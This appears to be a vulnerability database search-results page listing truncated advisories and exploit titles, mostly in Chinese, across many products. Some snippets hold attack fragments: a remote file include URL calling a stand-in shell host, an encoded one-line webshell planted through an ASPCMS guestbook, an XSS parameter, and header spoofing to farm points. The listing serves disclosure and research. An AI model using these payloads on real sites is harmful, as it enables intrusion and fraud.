56796 matches found
用友NC-IUFO系统 /epp/detail/publishinfodetail.jsp SQL注入漏洞
No description provided by source...
cmstop媒体云sql注入漏洞(1)-order by 注入技巧
简要描述: 今天无聊就多看了一会儿媒体云的产品,order by 后面的注入技巧 详细说明: 其他说明见: WooYun: cmstop媒体云SQL注入漏洞 同样的cmstop 媒体云的注入 注册账号后,在选择链接分类的时候,会发生如下链接 http://site.cmstop.cn/link/index/list?type=1&offset=0&limit=50&=1440172313381&sort=desc&category=2 但是其中的sort参数过滤不严格,导致了一个order by后面的mysql注入...
lighttpd 1.4.31 Denial of Service PoC
No description provided by source. !/bin/bash Exploit Title: simple lighttpd 1.4.31 DOS POC Date: 11/21/2012 Exploit Author: [email protected] Vendor Homepage: http://www.lighttpd.net Software Link: http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-1.4.31.tar.gz Version: 1.4.31 Tested on:...
lighttpd畸形HTTP Connection域处理拒绝服务漏洞
CVECAN ID: CVE-2012-5533 lighttpd是一款开源的轻量级Web服务器。 lighttpd 1.4.31在处理某些HTTP请求头时,"httprequestsplitvalue"函数src/request.c在处理特制的"Connection"报头域时会陷入无限循环。攻击者利用此漏洞可导致Lighttpd拒绝服务。 0 lighttpd 1.4.31 厂商补丁: Lighttpd -------- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...
OpenSSL DTLS报文多个拒绝服务漏洞
Bugraq ID: 35001 CVE ID:CVE-2009-1378 CVE-2009-1377 CNCVE ID:CNCVE-20091378 CNCVE-20091377 OpenSSL是一款开放源码的SSL实现,用来实现网络通信的高强度加密。 OpenSSL存在多个漏洞,远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。 -OpenSSL库没有正确限制缓冲DTLS记录的数值,提交特殊构建的DTLS报文可导致消耗所有内存。 -处理DTLS消息时存在错误,通过发送大量乱序的握手消息可消耗大量内容。 OpenSSL Project OpenSSL 0.9.8 k OpenSSL...
Apache mod_rewrite模块单字节缓冲区溢出漏洞
Apache是一款开放源代码WEB服务程序。 Apache的modrewrite模块在转义绝对URI主题时存在单字节缓冲区溢出漏洞,攻击者可能利用此漏洞在服务器上执行任意指令。 modrewrite模块的escapeabsoluteuri函数分离LDAP URL中的令牌时,会导致在字符指针数组以外写入指向用户控制数据的指针,这样就可能完全控制受影响的主机。 Apache Group Apache 2.2.x = 2.2.0 Apache Group Apache 2.0.x = 2.0.46 Apache Group Apache 1.3.x = 1.3.28 临时解决方法:...
Mikrotik Winbox 任意文件访问漏洞
In April 23rd 2018, Mikrotik fixed a vulnerability “that allowed gaining access to an unsecured router”. myself and @yalpanian of BASU CERT reverse engineering lab tried to figure out what exactly got fixed, what was the problem in the first place and how severe was the impact of it. UPDATE: full...
泛微 OA /js/swfupload/swfupload.swf xss漏洞
No description provided by source...
海康威视视频接入网关系统 downFile.php 参数fileName 任意文件下载漏洞
0x01漏洞简介 海康威视视频接入网关系统在页面/serverLog/downFile.php的参数fileName存在任意文件下载漏洞。 0x02漏洞分析 文件/serverLog/downFile.php alert"文件不存在!";window.history.back-1;'; exit; else $file = fopen$filedir . $filename,"r"; // 打开文件 // 输入文件标签 Header"Content-type: application/octet-stream"; Header"Accept-Ranges: bytes";...
Hikvision iVMS-8700 Tomcat 任意文件创建漏洞
No description provided by source...
YXcms越权修改任意用户资料,获取任意用户密码
简要描述: YXcms建站系统修改用户资料时,对用户身份没有进行验证,导致越权操作 详细说明: 1、涉及版本YXcms1.2.6 2、下载地址:http://www.yxcms.net/ 系统演示地址:http://demo.yxcms.net/index.html 3、用户完善自己资料内容时,系统根据用户id在后台进行操作。但用户id的设置只是简单的数字,因此通过修改id,我们可以修改任意用户的资料信息。 漏洞证明: 1、登录系统,进入会员中心,在资料完善模块填写要修改的用户基本资料。 2、为了演示漏洞,我们注册了一个id为1的被攻击账户,抓包修改id为被攻击者的id,即为1。...
XTACACSD report() 缓冲区溢出漏洞
No description provided by source...
doyo 2.3 /template.php 本地文件包含漏洞
DOYO在template传参时,由于Template.php对传入文件路径的处理不当,逻辑错误,导致可包含任意文件(含相对路径)。 doyo 2.3...
Discuz推广功能任意刷分
简要描述: DZ的访问加分的推广功能存在缺陷 详细说明: 这里是定义IP的地方 当XFORWARDEDFOR头存在并且不为那几种情况时使用这个作为IP地址 因为推广积分是跟访问IP有关的,所以只要修改XFORWARDEDFOR就可以任意刷积分了 漏洞证明: array'method' = "GET",'ignoreerrors'=true, 'header' = "XFORWARDEDFOR: $ip"; $url = "http://www.xxx.com/forum.php?fromuid=3007"; $contents =...
ASPCMS留言板插马
简要描述: 朋友丢来一个程序,看着看着就发现了一个漏洞,ASPCMS最新版本直接拿shell,应该很多人早就发现了。 详细说明: google关键字:powered by ASPCMS 大概有几十页网站,基本上都可以拿下,aspcms主要是信息发布系统,影响版本为asp。漏洞成因,在留言板处对信息处理不当,导致代码注入。可直接将一句话木马插入数据库。 数据库默认配置为asp.目录在/data/data.asp下。 利用方法,保证默认数据库路径末更改及可留言,就算不能留言,可构造,经测试,九成的末更改: 在留言的标题处插入:┼攠數畣整爠煥敵瑳∨≡┩愾 这样就往数据库中插入了一句话,密码为a...
MySQL CREATE TABLE调用绕过访问限制漏洞
CVE ID: CVE-2008-7247 MySQL是一款使用非常广泛的开放源代码关系数据库系统,拥有各种平台的运行版本。 当数据主目录包含有到不同文件系统的符号链接时,MySQL的ql/sqltable.cc允许通过认证的远程攻击者通过以特殊DATA DIRECTORY或INDEX DIRECTORY参数调用CREATE TABLE绕过预期的访问限制,执行各种非授权操作。 MySQL AB MySQL 6.0 MySQL AB MySQL 5.1.x MySQL AB MySQL 5.0.x 厂商补丁: MySQL AB --------...
MailEnable WebAdmin绕过认证漏洞
MailEnable是一款商业性质的POP3和SMTP服务器。 MailEnable的WebAdmin登录进程实现上存在安全漏洞,攻击者可能利用此漏洞无需口令便可成功登录,获得非授权访问。 MailEnable MailEnable Professional Edition 2.32 MailEnable MailEnable Enterprise Edition 2.32 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.mailenable.com/hotfix/ME-10019.ZIP...
Mambo phpShop Component <= 1.2 RC2b File Include Vulnerability
No description provided by source. Affected Application: Mambo phpShop v1.2 RC2b Mambo CMS Component . . : contact : . . . . . . . . . . . . . . . . . . . . . . . . . . . Discoverd/Found by: Charles Nelwan a.k.a Cmaster4 Team: BatamHacker irc.dal.net crew URL: http://www.batamhacker.info/forum...
Tenda AC15 Router - Unauthenticated Remote Code Execution(CVE-2018-5767)
INTRODUCTION In this post we will be presenting a pre-authenticated remote code execution vulnerability present in Tenda’s AC15 router. We start by analysing the vulnerability, before moving on to our regular pattern of exploit development – identifying problems and then fixing those in turn to...
科讯网校系统xss漏洞(密码为MD5加密)
简要描述: 大CMS厂商。。 http://www.kesion.com/ 已有 469,628 个网站选择KESION产品搭建,今日新增网站 104 个 拿了好多证书。 详细说明: 首先在他们网站 http://e.kesion.com/model/view.aspx?mid=3&id=4373 我目测只要有回复框就百分百存在这漏洞 而且全站判断的方式一样 为什么这样说呢 往下面看就知道了 http://e.kesion.com/model/view.aspx?mid=3&id=4373 2014年司法考试历年真题课件-民法 OK...
flinx <= 1.3 (category.php id) Remote SQL Injection Vulnerability
No description provided by source. -------------------------------------------------------------- H-T Team HouSSaMix + ToXiC350 + RxH -------------------------------------------------------------- Author : Houssamix From H-T Team Script : flinx 1.3 & below Download :...
MS Windows Color Management Module Overflow Exploit (MS05-036) (2)
No description provided by source. / \ MS05-036 ICC Stack Overflow Exploit / by Darkeagle \ / GreetZ: all unl0ckerz, ed, f0st, uf0, sowhat, str0ke, black, redsand \ / \ special tnx to snooq for his PoC. / \ / xploit was tested on WinXP SP1 RUS with explorer.exe \ / 02.08.05 \ /...
Remote Code Execution on the Smiths Medical Medfusion 4000
Remote Code Execution on the Smiths Medical Medfusion 4000 In which we detail the process of vulnerability research on a life critical embedded system: a medical infusion pump. Table of Contents Remote Code Execution on the Smiths Medical Medfusion 4000 Table of Contents Summary Introduction Why ...
BinGo News <= 3.01 (bnrep) Remote File Include Vulnerability
在文件bpncom.php中,未对包含对象参数bnrep做过滤导致远程文件包含漏洞,代码如下 include $bnrep."bnconfigs.php"; 可导致远程文件包含如下: http://example.com/path/bpncom.php?bnrep=http://SHELLURL.COM...
Zorum 3.5 DBProperty.PHP Remote File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/20606/info Zorum is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. A successful exploit of this issue allows an attacker to execute arbitrary server-side script cod...
Discuz! 6.0.0&6.1.0 spache.php SQL注入漏洞
No description provided by source...
Chrome 远程代码执行漏洞(CVE-2021-21220)
...
D-Link DNS-320 命令注入漏洞(CVE-2020-25506)
...
UEditor SSRF漏洞(JSP版本)分析与复现
作者: 浮萍@猎户安全实验室 公众号:猎户安全实验室 前些时间测试的时候遇到了一个系统采用了UEditor编辑器,版本为1.4.3。已知该编辑器v1.4.3版本存在SSRF漏洞,虽然是Bool型的SSRF,除了可以进行内网探测外,也可以根据web应用指纹信息,之后进行进一步的测试。 0x01 前言 查看官方的更新日志可以发现UEditor编辑器在版本1.4.3.1修复了SSRF漏洞。...
Gopherd <= 3.0.5 FTP Gateway Remote Overflow Exploit
No description provided by source. / UMN gopherd2.x.x/3.x.x: remote ftp gateway buffer overflow. by: vade79/v9 v9 at fakehalo.deadpig.org fakehalo/realhalo three years since last audit, code is a little more secure. but, still found a few potentially exploitable situations. this exploits the ftp...
用友某产品Struts命令执行漏洞(可导致金融、保险、基金等行业用户受到影响)
简要描述: 用友客服系统某产品命令执行漏洞(涉及金融、保险、基金等行业用户) 详细说明: 用友的客服系统存在最新的struts命令执行漏洞 涉及金融、保险、基金等行业用户 中国大地保险...
ISC BIND 9 Large RRSIG RRsets远程拒绝服务漏洞
BUGTRAQ ID: 48007 CVECAN ID: CVE-2011-1910 BIND是一个应用非常广泛的DNS协议的实现,由ISC负责维护,具体的开发由Nominum公司完成。 ISC BIND 9在实现上存在远程拒绝服务漏洞,远程攻击者可利用此漏洞造成应用程序进程崩溃,拒绝服务合法用户。 由于错误的处理了某些源记录集RRsets, 攻击者可用过大的RRSIG RRsets设置DNSSEC签署的授权DNS服务器作为触发器,然后向缓存解析器请求故障服务器服务的域中不存在的名称,获取的回应将触发漏洞。 FreeBSD FreeBSD 8.x FreeBSD FreeBSD 7.x...
Apache 'mod_proxy_http' Interim Response Denial of Service Vulnerability
CVE: CVE-2008-2364 The Apache 'modproxyhttp' module is prone to a denial-of-service vulnerability that affects the processing of interim responses. Attackers may exploit this issue to cause denial-of-service conditions. Reportedly, the issue affects Apache 2.2.8 and 2.0.63; other versions may als...
WordPress WP-FeedStats HTML注入漏洞
WordPress是一款基于WEB的网络日记程序。 WordPress不正确过滤用户提的输入,远程攻击者可以利用漏洞进行HTML注入攻击,获得敏感信息。 问题是'WP-FeedStats'脚本对用户提交的WEB参数缺少过滤,提交恶意脚本代码作为参数数据,并诱使用户访问,可获得目标用户敏感信息。 WP-FeedStats 2.1 目前没有解决方案提供: http://bueltge.de/wp-feedstats-de-plugin/171/ http://www.example.com/wp1/?feed=rss2&scriptalert1/script...
Cisco Adaptive Security Appliance - Path Traversal (CVE-2018-0296)
!/usr/bin/python -- coding: utf-8 -- from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils import register import urlparse class TestPOCPOCBase: name = "Cisco Adaptive Security Appliance - Path Traversal" vulID = 'CVE-2018-0296' author = 'sebao' vulType = 'Path...
泛微OA系统日志泄露漏洞
No description provided by source...
Yellow Swordfish Simple Forum 1.x 'topic' Parameter SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/27825/info Simple Forum is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise...
Struts2/XWork < 2.2.0 - Remote Command Execution Vulnerability
漏洞详情 在struts2中,DefaultActionMapper类支持以"action:"、"redirect:"、"redirectAction:"作为导航或是重定向前缀,但是这些前缀后面同时可以跟OGNL表达式,由于struts2没有对这些前缀做过滤,导致利用OGNL表达式调用java静态方法执行任意系统命令。 这里以“redirect:”前缀举例,struts2会将“redirect:”前缀后面的内容设置到redirect.location当中,这里我们一步步跟踪,首先是这个getMapping函数跟入 这里一直到这个handleSpecialParameters,继续跟入...
MySQL空两进制字符串远程拒绝服务漏洞
BUGTRAQ ID: 31081br / CVE ID:CVE-2008-3963br / CNCVE ID:CNCVE-20082358br / br / MySQL是一款开放源代码的数据库应用程序。br / MySQL处理空两进制值存在问题,远程攻击者可以利用漏洞使服务程序崩溃。br / 通过Mysql客户端提交如下查询:br / select b'';br / 可导致服务程序崩溃。br / MySQL AB MySQL 6.0.4 MySQL AB MySQL 5.1.23 MySQL AB MySQL 5.0.60 可升级到最新版本:...
Lucee Server 未授权RCE漏洞(CVE-2021-21307)
Finding 0day to hack Apple Getting started We started hacking on Apple after the infamous blog post by Sam, et al. The goal was to focus on critical findings such as PII exposure or getting access to Apple's servers/internal network. These are the types of bugs we thought Apple would be most...
PHP-Nuke 7.0/8.1/8.1.35 - Wormable Remote Code Execution
No description provided by source. !/usr/bin/php ?php / Wormable Remote Code Execution in PHP-Nuke 7.0/8.1/8.1.35newist as of release Vendor's Website:http://phpnuke.org/ Secuirty Researcher: Michael Brooks https://sitewat.ch Original Advisory:...
PostgreSQL安全限制绕过漏洞
BUGTRAQ ID: 65723 CVECAN ID: CVE-2014-0060 PostgreSQL是一款高级对象-关系型数据库管理系统,支持扩展的SQL标准子集。 PostgreSQL 9.3.3, 9.2.7, 9.1.12, 9.0.16, 8.4.20之前版本在实现上存在安全漏洞,“GRANT ... WITHOUT ADMIN OPTION”限制可被绕过,攻击者可利用此漏洞获取管理员权限,撤销其他用户的访问权限。 0 PostgreSQL PostgreSQL 8.x 厂商补丁: PostgreSQL ----------...
Oracle MySQL Server 'InnoDB'子组件远程安全漏洞(CVE-2013-0368)
BUGTRAQ ID: 57397 CVECAN ID: CVE-2013-0368 Oracle MySQL Server是一个轻量的关系型数据库系统。 Oracle MySQL Server 5.5.28及更早版本存在远程安全漏洞,可通过'MySQL Protocol'协议利用此漏洞。'InnoDB'子组件受到影响。通过身份验证的远程攻击者可利用此漏洞进行攻击从而影响MySQL Server的可用性。 0 Oracle MySQL Server = 5.5.28 厂商补丁: Oracle ------...
Microsoft IIS FTP服务器递归列表拒绝服务漏洞
BUGTRAQ ID: 36273 CVECAN ID: CVE-2009-2521 Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 IIS的FTPd的Glob功能在处理递归目录列表请求时存在栈溢出漏洞,拥有对目录写访问权限的远程攻击者可以通过提交包含有通配符(如“”)的请求触发这个溢出,导致FTP服务崩溃。 Microsoft IIS 7.0 Microsoft IIS 6.0 Microsoft IIS 5.1 Microsoft IIS 5.0 厂商补丁: Microsoft...
Apache HTTP Server AllowOverride选项绕过安全限制漏洞
BUGTRAQ ID: 35115 CVECAN ID: CVE-2009-1195 Apache HTTP Server是一款流行的Web服务器。 Apache HTTP Server没有正确地处理AllowOverride指令中的Options=IncludesNOEXEC选项,本地用户可以通过在.htaccess文件中配置1 Options Includes、2 Options +Includes或3 Options +IncludesNOEXEC并在.shtml文件中注入exec元素导致绕过安全限制获得权限。 Apache 2.2.x 厂商补丁: Apache Group...
Check Point FireWall-1 PKI Web服务远程溢出漏洞
BUGTRAQ ID: 34286 Check Point Firewall-1是一款高性能防火墙。 Check Point Firewall-1中默认监听于TCP 18264端口上的PKI Web服务存在缓冲区溢出漏洞。如果远程攻击者向该服务发送了包含有超长Authorization或Referer头的特制HTTP请求的话,就可以触发这个溢出,导致执行任意代码。 Check Point Software Firewall-1 Check Point Software --------------------...
VMware Workstation 6.0多个安全漏洞
BUGTRAQ ID: 25728,25729,25731,25732 CVECAN ID: CVE-2007-0061,CVE-2007-0062,CVE-2007-0063,CVE-2007-4059,CVE-2007-4155,CVE-2007-4496,CVE-2007-4497 VMWare是一款虚拟PC软件,允许在一台机器上同时运行两个或多个Windows、DOS、LINUX系统。 VMWare的实现上存在多个安全漏洞,可导致多种威胁。 具体如下: 1 VMWare的DHCP服务器可被恶意网页用来获取系统权限。 2...
AY Systems Web Content System远程文件包含漏洞
AY Systems Web Content System是一款基于PHP的WEB内容管理程序。 AY Systems Web Content System不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'main.php'脚本对用户提交的'pathShowProcessHandle'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 AY System Solutions Web Content System 2.6 http://www.aysad.net/...
macOS/IOS: mach_msg doesn't copy memory in a certain case(CVE-2017-2456)
When sending ool memory via |machmsg| with |deallocate| flag or |MACHMSGVIRTUALCOPY| flag, |machmsg| performs moving the memory to the destination process instead of copying it. But it doesn't consider the memory entry object that could resurrect the moved memory. As a result, it could lead to a...
deV!L`z Clanportal 1.5 - Mullti Vulnerability
No description provided by source...